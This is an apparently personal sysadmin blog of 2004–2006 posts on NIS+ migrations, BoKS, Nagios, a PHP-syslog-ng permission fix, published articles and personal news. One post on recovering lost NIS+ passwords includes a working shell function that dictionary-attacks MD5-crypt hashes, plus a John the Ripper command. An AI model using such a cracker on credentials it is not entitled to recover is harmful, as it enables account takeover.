* Tuesday = The Solaris service management facility

* Wednesday = Host configuration and maintenance with CFEngine

* Naturally we'll also be attending the Social Event on Thursday.

Just look for the guy with the funky iBook and the Snow t-shirt. <3

I get published! Again :)

2006-02-06 20:37:00


Today I received my copy of the February issue of ;Login:, which contains my most recent article, the one about planning projects and your personal time. I love having stuff published. Once Anime Con 2006 is over and done with I'll probably write some more articles! Speaking of Anime Con, I'd better get to work before going to bed :p

Hacked admin mode into Syslog-ng

2005-11-22 11:09:00

At $CLIENT I've built a centralised logging environment based on Syslog-ng, combined with MySQL. To make anything useful out of all the data going into the database we use PHP-syslog-ng. However, I've found a bit of a flaw with that software: any account you create has the ability to add, remove or change other accounts... which kinda makes things insecure.

So yesterday was spent teaching myself PHP and MySQL to such a degree that I'd be able to modify the guy's source code. In the end I managed to bolt on some sort of "admin-mode" which allows you to set an "admin" flag on certain user accounts (thus giving them the capabilities mentioned above).

The updated PHP files can be found in the TAR-ball in the menu of the Sysadmin section. The only thing you'll need to do to make things work is to either:

1. Re-create your databases using the dbsetup.sql script.

2. Add the "admin" column to the "users" table using the following command: ALTER TABLE users ADD COLUMN admin BOOLEAN;

Added Nagios plugins

2005-09-11 01:00:00

I've added all the custom Nagios monitors I wrote for $CLIENT. They might come in handy for any of you. They're not beauties, but they get the job done.

Nagios and BoKS/Keon

2005-09-11 00:47:00

Major updates in the Sysadmin section! w00t!

In this case, a lot of information on one of my favourite security tools and on Nagios, my new-found love on the monitoring front.

My article on personal planning

2005-09-07 10:15:00

It has been a very long time in coming, but I finally got around to finishing version 1.0 of my tutorial/article on planning. One thing most people in IT are notoriously bad at is writing and maintaining a project plan (or their personal planning, for that matter). I was originally asked by my boss at $PREV-CLIENT to write this article, but I never got around to finishing it before I left.

Aniway... It's still version 1.0, so it's still quite rough around the edges. I hope to get a whole load of reviews from friends/colleagues before submitting it to ;Login: for publication. In the meantime you guys can find it in the Sysadmin section. I hope you enjoy reading it!

Sysadmin toolkit

2005-08-02 15:34:00

It's been long in coming, but after years I finally got 'round to putting together my Sysadmin's Toolkit. Check it out on the left for an introduction and some photographs.

Jumpstart, FLAR and console servers

2005-07-01 15:22:00

Currently at the office, so I'll make it a quick one :3

Unfortunately I've been putting in longer days than I should this week. I mean, it's not a horrendous amount of hours, but still I'd rather be at home relaxing. This week has seen the people in charge at $CLIENT up the prio on a centralised Jumpstart/FLAR server, which I was supposed to deliver. I was already working on it part time, but now they have me working on it full time. It's quite a lot of fun, since I get to work together with other departments within $CLIENT, thus making more friends and allies ^_^

I also had to struggle with Perle IOLan+ terminal servers this week, since we need to be able to use the serial management port on our Sun servers. Yes, admittedly these boxen do work for this purpose, but I'd rather have a proper console server instead of a piece of kit which was originally meant as a dial-in box for dumb terminals or modems. Let's just say that I dream of Cyclades.

Oh! Last Wednesday was my birthday by the way... I've hit 26 now :3 We went out for a lovely dinner at Konichi wa in Utrecht, since we wanted to try out a different Japanese restaurant for a change. I must say: their price/quality ratio is really good! If you're ever in the neighbourhood of Utrecht and feel like Japanese, head over there! They're at Mariaplaats 9. BTW, they don't just do Tepan Yaki... They also serve excellent sushi and will make you _ramen_ or _udon_ noodles if you ask nicely!!! My new favourite restaurant :9

Rebuilding your company's network

2005-03-14 06:51:00

Currently listening to "Ode to my family" by the Cranberries.

Wooh boy, what a weekend! I never knew that changing one simple IP address on a server could have such pronounced effects.

Due to our IP ranges at work being too limited the Networks department has been working hard to get new switches installed. They're moving all of our servers from VLANs with a netmask of to ones with a netmask of As you can imagine this broadens the range of one VLAN significantly. That all sounds good, right? Well, naturally we need to be present to change the IP settings for all of our servers. Also, not too much work. Were it not for the fact that two of the servers being moved are replica servers for BoKS and NIS+.

Now normally these transitions aren't that difficult to perform, were it not for the fact that NIS+ had decided to act like an utter bitch for the weekend! After moving the server to its new switch we needed to rebuild it as a replica in order to propagate the new IP to all of its clients through the master. Usually this takes about half an hour, including the table copies. This time around though she was determined to cooperate as little as possible! Copying one table took about an hour from entering the command to finishing the copy!

All in all it cost me the better part of seven hours to get everything in place! Grrargh. But, in my defense, that includes reconfiguring all BoKS client systems and waiting until Networks had laid out the required patches :[

Migrating to a new NIS+ master

2005-02-21 08:30:00

Currently listening to "Press Conference rag" from the musical Chicago.

What a relief! We finally managed to move NIS+ to a new master server. We put in about twelve hours on Saturday, but we finally got that bitch tamed! :) Proper credit needs to be awarded, so I would like to say that our success was mostly due to the scripts crafted by Jeroen and Roland.

Switching NIS+ to a new master server

2005-01-16 15:38:00

Bad news for those sysadmins out there waiting for news regarding NIS+. We tried our best yesterday, but moving NIS+ to a new master server failed again :( This time around we used a tried and true procedure (although much improved upon by Jeroen), which is usually reserved for worst-case scenarios. Unfortunately we ran into some unforeseen problems. I'll tell you more about them when I deliver the _real_ procedure.

Hacking NIS+ and BoKS

2004-11-17 18:25:00

Holy moly, what a weekend! I can tell you guys right now that the procedure I wrote for switching NIS+ master servers is NOT foolproof! We had planned to take about four hours at most for switching both NIS+ and BoKS over to a new master server. Unfortunately it turned out that we would only get to spend one hour on switching NIS+ before things went horribly sour.

In the end I spent a total of eighteen hours in the office on Saturday and Sunday. I'll spare you the gory details for now (I'll incorporate them in version 2.0 of the master switch procedure).

But God, what a weekend! And the way it looks now we'll be repeating it in a week or so...

Aniwho... I'm still trying to put as much time as possible into my work for the convention, but it's going slowly. I plan on spending every free minute of coming Thursday on my Foundation work though. That should get me along the way nicely.

Moving NIS+ to a new master server

2004-11-15 20:14:00

Finally got round to writing the "Switch to a new master" procedure for NIS+. This procedure is damn handy when you want to move your current NIS+ root master to new hardware. This is something that we'll be doing at my employer on the 20th of November, so I'll keep you guys posted. I'll also be sure to update the procedure should anything go wrong :]

Additions to the Sysadmin section

2004-11-15 19:17:00

More expansion in the UNIX Sysadmin section! I've added procedures for initialising new NIS+ clients and for switching NIS+ over to a new master server.

Writing more articles

2004-11-11 21:55:00

The way things are looking right now I'll be writing a whole series of articles for the discerning system admin :) As you know I finished an article on the crafting of proposals a week or so ago. Now I'm also planning to do articles on "keeping personal and project planning" and on "catastrophe management".

I'll also be using my lovely Powermac G5 for something completely new today! At the office we lost two passwords for NIS+ credentials, and luckily we managed to retrieve what we _think_ are the encrypted password strings. So now I'll try and use John the Ripper to crack the passwords. I've no clue how long this'll take and I hope I can get things finished before the 20th. 'Cause that's when I need the damn passwords :)
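For the curious: what John does in wordlist mode is essentially a dictionary attack, i.e. hash every candidate word with the salt taken from the stolen hash and compare the results. The toy sketch below is my own illustration, not how John is implemented: it uses MD5-crypt hashes (because `openssl passwd -1` can generate those; NIS+ credentials would normally be plain crypt(3) hashes) and an invented wordlist. John itself (`john --wordlist=words.txt hashes.txt`) does the same thing vastly faster.

```shell
# crack_hash HASH WORDLIST
# Toy dictionary attack against an MD5-crypt hash ($1$salt$...):
# re-hash each candidate word with the hash's own salt and compare.
crack_hash() {
    salt=$(printf '%s' "$1" | cut -d'$' -f3)
    while IFS= read -r word; do
        if [ "$(openssl passwd -1 -salt "$salt" "$word")" = "$1" ]; then
            echo "$word"
            return 0
        fi
    done < "$2"
    return 1
}
```

Purely to show the principle; for real work, use John.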

Reviewing NIS+ books

2004-11-11 19:51:00

I've added a little review page for books on the topic of NIS+, since that's something I'm currently very into at the office.

How to write proposals

2004-11-01 09:33:00

Version 2.0 of my tutorial on writing proposals is available from the menu now. Share and enjoy!

Writing technical proposals

2004-10-23 09:05:00

Finally my work on the HOWTO for writing technical proposals is done! I've added the PDF file to the menu bar on the left. Unfortunately, for some reason PDF printing from OpenOffice doesn't always seem to work properly. The file in the menu bar prints perfectly when dragged onto my desktop printer (albeit in black and white, and not in color), but both Preview and Acrobat Reader refuse to open the file.

If any of you guys happen to have any problems opening the file, please let me know. I'll see what I can do to get things fixed.

SCNA erratum

2004-09-22 20:01:00

In the menu of the Sysadmin section you will also find a link to a small erratum which I wrote after reading Rick Bushnell's book. As you can see I found quite a number of errors. I also e-mailed this list to Prentice Hall publishers and hope that they will make proper use of the list.

Passed my SCNA exam

2004-09-22 13:26:00

Booyeah! While I can't say that I aced the SCNA exam, I'm still extremely happy with my score: 89% (52 out of 58 scored questions).

SCNA summary done!

2004-09-15 22:13:00

Well, it took me a couple of days, but finally it's done: my summary of the "SCNA study guide" by Rick Bushnell (see the book list). I'll be taking my first shot at the SCNA exam in about a week (the 22nd, keeping my fingers crossed), so I'm happy that I've finished the document. I thought I'd share it with the rest of you; maybe it'll be of some use.

All 29 pages are available for download as a PDF from the Sysadmin section.

Travelling to Brussels, teaching a course

2004-02-10 08:01:00

Ah! This feels so incredibly good! ^_^

Today I'm travelling to Brussels, instead of heading off to the office like any other day, to give a short course to our IT colleagues over there. We're busy on a very exciting (and tiring) project which involves migrating hundreds of servers from London, over to the EU mainland. These servers will be placed within domains which involve a certain piece of security software that we use at $CLIENT, and the course I'm about to give covers just that!

Anyway. Not to delve too much into our company politics :) The reason I'm feeling so well this morning (it's about 8:30 now) is because I get to take the Thalys train into Brussels! This involves getting up at five in the morning, riding a luxury cab to Schiphol airport and then getting on the train around 7:15. $CLIENT even sprang for a first class ticket for me! So that means that I get to sit in a _very_ comfy seat, while working on the company's laptop and getting pampered by two lovely ladies. Don't you just _love_ a good, free breakfast?!

Speaking of pampering: I just booked a cab ride in Brussels _from_ the train! ^_^ This is so weird! I just can't help feeling giddy with excitement. (Gee Cailin! I guess you don't get around much, do you?!)

And speaking of laptops: right now I'm working on this HP Omnibook I borrowed from the company. It's running NT4, so it's both slow and unstable :( But my experiences during the last two weeks have led me to decide that I seriously want a laptop of my own. Preferably an iBook of course! It's unbelievable how bloody useful these contraptions are and the amount of work I can get done with them while on the road!

Aniway, I'd better get back to work now! I'll be arriving at Brussels around 9:30, so I'd better review my course material one more time *shudder*

Cheers!

Older blog posts